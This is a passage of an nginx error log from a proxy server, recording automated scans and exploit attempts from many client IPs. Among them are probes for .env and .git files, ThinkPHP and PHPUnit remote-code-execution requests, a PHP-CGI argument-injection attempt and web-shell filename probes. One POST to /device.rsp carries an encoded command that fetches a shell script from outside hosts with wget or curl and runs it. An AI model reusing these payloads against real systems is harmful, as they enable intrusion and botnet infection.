239#239: *13147 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:20:27 [error] 239#239: *13147 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:20:30 [error] 239#239: *13147 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:20:38 [error] 239#239: *13147 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:25:16 [error] 236#236: *13150 open() "/var/www/html/.env" failed (2: No such file or directory), client: 77.83.39.197, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.215.191" +2026/01/27 12:31:39 [error] 236#236: *13151 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 14:05:15 [error] 237#237: *13196 open() "/var/www/html/device.rsp" failed (2: No such file or directory), client: 204.76.203.49, server: localhost-nginx-proxy-manager, request: "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp+%7C%7C+cd+%2Fvar%2Ftmp+%7C%7C+cd+%2Fvar%2Frun+%7C%7C+cd+%2Fmnt+%7C%7C+cd+%2Froot+%7C%7C+cd+%2F%3Brm+-rf+sys64%2A%3Bwget+http%3A%2F%2F204.76.203.49%2Fd.sh+%7C%7C+curl+-O+--connect-timeout+10+http%3A%2F%2F223.26.52.213%2Fd.sh%3Bchmod+%2Bx+d.sh%3Bchmod+777+d.sh%3B.%2Fd.sh+v5jxp90%3Brm+-f+d.sh%25%21%28EXTRA+string%3D223.26.52.213%2C+string%3D%2F%2C+string%3Dxp8%29 HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 14:07:21 [error] 237#237: *13197 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 14:14:50 [error] 237#237: *13199 open() "/var/www/html/wp-content/plugins/hellopress/wp_filemanager.php" failed (2: No such file or directory), client: 20.89.149.127, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/27 14:14:50 [error] 237#237: *13199 open() "/var/www/html/p.php" failed (2: No such file or directory), client: 20.89.149.127, server: localhost-nginx-proxy-manager, request: "GET /p.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/27 14:14:50 [error] 237#237: *13199 open() "/var/www/html/s1.php" failed (2: No such file or directory), client: 20.89.149.127, server: localhost-nginx-proxy-manager, request: "GET /s1.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/27 14:14:50 [error] 237#237: *13199 open() "/var/www/html/k.php" failed (2: No such file or directory), client: 20.89.149.127, server: localhost-nginx-proxy-manager, request: "GET /k.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/27 14:14:51 [error] 237#237: *13199 open() "/var/www/html/as.php" failed (2: No such file or directory), client: 20.89.149.127, server: localhost-nginx-proxy-manager, request: "GET /as.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/27 14:14:51 [error] 237#237: *13199 open() "/var/www/html/xa.php" failed (2: No such file or directory), client: 20.89.149.127, server: localhost-nginx-proxy-manager, request: "GET /xa.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/27 14:14:51 [error] 237#237: *13199 open() "/var/www/html/bypass.php" failed (2: No such file or directory), client: 20.89.149.127, server: localhost-nginx-proxy-manager, request: "GET /bypass.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/27 14:14:52 [error] 237#237: *13199 open() "/var/www/html/about.php" failed (2: No such file or directory), client: 20.89.149.127, server: localhost-nginx-proxy-manager, request: "GET /about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/27 14:14:52 [error] 237#237: *13199 open() "/var/www/html/re.php" failed (2: No such file or directory), client: 20.89.149.127, server: localhost-nginx-proxy-manager, request: "GET /re.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/27 14:14:52 [error] 237#237: *13199 open() "/var/www/html/m.php" failed (2: No such file or directory), client: 20.89.149.127, server: localhost-nginx-proxy-manager, request: "GET /m.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/27 14:14:52 [error] 237#237: *13199 open() "/var/www/html/ad.php" failed (2: No such file or directory), client: 20.89.149.127, server: localhost-nginx-proxy-manager, request: "GET /ad.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/27 14:14:53 [error] 237#237: *13199 open() "/var/www/html/222.php" failed (2: No such file or directory), client: 20.89.149.127, server: localhost-nginx-proxy-manager, request: "GET /222.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/27 14:14:53 [error] 237#237: *13199 open() "/var/www/html/buy.php" failed (2: No such file or directory), client: 20.89.149.127, server: localhost-nginx-proxy-manager, request: "GET /buy.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/27 14:14:53 [error] 237#237: *13199 open() "/var/www/html/file.php" failed (2: No such file or directory), client: 20.89.149.127, server: localhost-nginx-proxy-manager, request: "GET /file.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/27 14:14:53 [error] 237#237: *13199 open() "/var/www/html/999.php" failed (2: No such file or directory), client: 20.89.149.127, server: localhost-nginx-proxy-manager, request: "GET /999.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/27 14:14:54 [error] 237#237: *13199 open() "/var/www/html/chosen.php" failed (2: No such file or directory), client: 20.89.149.127, server: localhost-nginx-proxy-manager, request: "GET /chosen.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/27 14:14:54 [error] 237#237: *13199 open() "/var/www/html/ahax.php" failed (2: No such file or directory), client: 20.89.149.127, server: localhost-nginx-proxy-manager, request: "GET /ahax.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/27 14:14:54 [error] 237#237: *13199 open() "/var/www/html/f35.php" failed (2: No such file or directory), client: 20.89.149.127, server: localhost-nginx-proxy-manager, request: "GET /f35.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/27 14:14:54 [error] 237#237: *13199 open() "/var/www/html/themes.php" failed (2: No such file or directory), client: 20.89.149.127, server: localhost-nginx-proxy-manager, request: "GET /themes.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/27 14:14:55 [error] 237#237: *13199 open() "/var/www/html/footer.php" failed (2: No such file or directory), client: 20.89.149.127, server: localhost-nginx-proxy-manager, request: "GET /footer.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/27 14:14:55 [error] 237#237: *13199 open() "/var/www/html/ma.php" failed (2: No such file or directory), client: 20.89.149.127, server: localhost-nginx-proxy-manager, request: "GET /ma.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/27 14:14:55 [error] 237#237: *13199 open() "/var/www/html/amax.php" failed (2: No such file or directory), client: 20.89.149.127, server: localhost-nginx-proxy-manager, request: "GET /amax.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/27 14:14:55 [error] 237#237: *13199 open() "/var/www/html/admin.php" failed (2: No such file or directory), client: 20.89.149.127, server: localhost-nginx-proxy-manager, request: "GET /admin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/27 14:14:56 [error] 237#237: *13199 open() "/var/www/html/bless.php" failed (2: No such file or directory), client: 20.89.149.127, server: localhost-nginx-proxy-manager, request: "GET /bless.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/27 14:14:56 [error] 237#237: *13199 open() "/var/www/html/wp-includes/assets/index.php" failed (2: No such file or directory), client: 20.89.149.127, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/assets/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/27 14:54:15 [error] 237#237: *13217 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 14:59:53 [error] 237#237: *13220 open() "/var/www/html/.env" failed (2: No such file or directory), client: 45.156.87.161, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.215.191" +2026/01/27 15:41:39 [error] 238#238: *13231 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 15:57:47 [error] 238#238: *13232 open() "/var/www/html/api/v0/blocks/latest" failed (2: No such file or directory), client: 137.103.240.172, server: localhost-nginx-proxy-manager, request: "GET /api/v0/blocks/latest HTTP/1.1", host: "cardano-mainnet.blockfrost.io" +2026/01/27 16:04:13 [error] 238#238: *13234 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.215.191" +2026/01/27 16:04:13 [error] 238#238: *13235 open() "/var/www/html/app/.env.token" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /app/.env.token HTTP/1.1", host: "91.82.215.191" +2026/01/27 16:04:13 [error] 238#238: *13236 open() "/var/www/html/api/.env_1.bak" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /api/.env_1.bak HTTP/1.1", host: "91.82.215.191" +2026/01/27 16:04:13 [error] 238#238: *13238 open() "/var/www/html/ci/config/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /ci/config/.env HTTP/1.1", host: "91.82.215.191" +2026/01/27 16:04:14 [error] 238#238: *13242 open() "/var/www/html/@fs/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /@fs/.env?raw?? HTTP/1.1", host: "91.82.215.191" +2026/01/27 16:04:14 [error] 238#238: *13243 open() "/var/www/html/API/.env.local" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /API/.env.local HTTP/1.1", host: "91.82.215.191" +2026/01/27 16:04:15 [error] 238#238: *13244 open() "/var/www/html/API/config.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /API/config.env HTTP/1.1", host: "91.82.215.191" +2026/01/27 16:04:15 [error] 238#238: *13245 open() "/var/www/html/app/rules/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /app/rules/.env HTTP/1.1", host: "91.82.215.191" +2026/01/27 16:04:15 [error] 238#238: *13246 open() "/var/www/html/cms/.env.local" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /cms/.env.local HTTP/1.1", host: "91.82.215.191" +2026/01/27 16:04:15 [error] 238#238: *13247 open() "/var/www/html/cms/config.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /cms/config.env HTTP/1.1", host: "91.82.215.191" +2026/01/27 16:04:15 [error] 239#239: *13248 open() "/var/www/html/app/config.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /app/config.env HTTP/1.1", host: "91.82.215.191" +2026/01/27 16:04:16 [error] 239#239: *13249 open() "/var/www/html/app/.env.back" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /app//.env.back HTTP/1.1", host: "91.82.215.191" +2026/01/27 16:04:16 [error] 239#239: *13250 open() "/var/www/html/admin/.env.aws" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /admin/.env.aws HTTP/1.1", host: "91.82.215.191" +2026/01/27 16:04:16 [error] 239#239: *13251 open() "/var/www/html/__tests__/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /__tests__/.env HTTP/1.1", host: "91.82.215.191" +2026/01/27 16:04:16 [error] 239#239: *13252 open() "/var/www/html/admin/.env.bak" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /admin/.env.bak HTTP/1.1", host: "91.82.215.191" +2026/01/27 16:04:16 [error] 239#239: *13253 open() "/var/www/html/admin/.env.crt" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /admin/.env.crt HTTP/1.1", host: "91.82.215.191" +2026/01/27 16:04:17 [error] 239#239: *13254 open() "/var/www/html/admin/.env.dev" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /admin/.env.dev HTTP/1.1", host: "91.82.215.191" +2026/01/27 16:04:17 [error] 239#239: *13255 open() "/var/www/html/conf/.env.dist" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /conf/.env.dist HTTP/1.1", host: "91.82.215.191" +2026/01/27 16:04:17 [error] 239#239: *13256 open() "/var/www/html/admin/.env.gcp" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /admin/.env.gcp HTTP/1.1", host: "91.82.215.191" +2026/01/27 16:04:17 [error] 239#239: *13257 open() "/var/www/html/admin/.env.key" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /admin/.env.key HTTP/1.1", host: "91.82.215.191" +2026/01/27 16:04:17 [error] 239#239: *13258 open() "/var/www/html/admin/.env.log" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /admin/.env.log HTTP/1.1", host: "91.82.215.191" +2026/01/27 16:04:18 [error] 239#239: *13259 open() "/var/www/html/admin/.env.old" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /admin/.env.old HTTP/1.1", host: "91.82.215.191" +2026/01/27 16:04:18 [error] 239#239: *13260 open() "/var/www/html/admin/.env.pem" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /admin/.env.pem HTTP/1.1", host: "91.82.215.191" +2026/01/27 16:04:18 [error] 239#239: *13261 open() "/var/www/html/admin/.env.tmp" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /admin/.env.tmp HTTP/1.1", host: "91.82.215.191" +2026/01/27 16:04:18 [error] 239#239: *13262 open() "/var/www/html/admin/.env.uat" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /admin/.env.uat HTTP/1.1", host: "91.82.215.191" +2026/01/27 16:04:18 [error] 239#239: *13263 open() "/var/www/html/app/.env.azure" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /app/.env.azure HTTP/1.1", host: "91.82.215.191" +2026/01/27 16:04:19 [error] 236#236: *13264 open() "/var/www/html/config/.env.db" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /config/.env.db HTTP/1.1", host: "91.82.215.191" +2026/01/27 16:07:21 [error] 236#236: *13267 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 172.208.49.189, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "91.82.215.191" +2026/01/27 17:16:31 [error] 246#246: *13286 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 17:25:58 [error] 243#243: *13290 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 85.95.191.148, server: localhost-nginx-proxy-manager, request: "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" +2026/01/27 18:26:10 [error] 243#243: *13311 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 18:47:32 [error] 246#246: *14806 open() "/var/www/html/sitemap.xml" failed (2: No such file or directory), client: 66.132.153.140, server: localhost-nginx-proxy-manager, request: "GET /sitemap.xml HTTP/1.1", host: "91.82.215.191" +2026/01/27 18:48:12 [error] 246#246: *14807 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 19:01:16 [error] 246#246: *14814 open() "/var/www/html/.env" failed (2: No such file or directory), client: 46.101.245.216, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.215.191" +2026/01/27 19:01:16 [error] 246#246: *14815 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 46.101.245.216, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "91.82.215.191" +2026/01/27 19:34:33 [error] 243#243: *14831 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:19:33 [error] 243#243: *14855 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:45:44 [error] 244#244: *14872 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:45:46 [error] 244#244: *14872 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:45:48 [error] 244#244: *14872 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:45:49 [error] 244#244: *14872 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:45:50 [error] 244#244: *14872 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:45:50 [error] 244#244: *14872 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:45:50 [error] 244#244: *14872 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:45:51 [error] 244#244: *14872 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:45:52 [error] 244#244: *14872 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:45:52 [error] 244#244: *14872 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:45:53 [error] 244#244: *14872 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:45:53 [error] 244#244: *14872 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:45:53 [error] 244#244: *14872 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:45:54 [error] 244#244: *14872 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:45:54 [error] 244#244: *14872 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:45:54 [error] 244#244: *14872 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:45:55 [error] 244#244: *14872 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:45:56 [error] 244#244: *14872 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:45:57 [error] 244#244: *14872 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:45:57 [error] 244#244: *14872 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:45:58 [error] 244#244: *14872 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:45:58 [error] 244#244: *14872 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:46:02 [error] 244#244: *14872 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:46:02 [error] 244#244: *14872 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:46:03 [error] 244#244: *14872 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:46:04 [error] 244#244: *14872 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:46:04 [error] 244#244: *14872 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:46:04 [error] 244#244: *14872 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:46:05 [error] 244#244: *14872 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:46:05 [error] 244#244: *14872 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:46:06 [error] 244#244: *14872 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:46:06 [error] 244#244: *14872 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:46:06 [error] 244#244: *14872 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:46:07 [error] 244#244: *14872 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115.190.108.231, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 20:46:08 [error] 244#244: *14872 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or 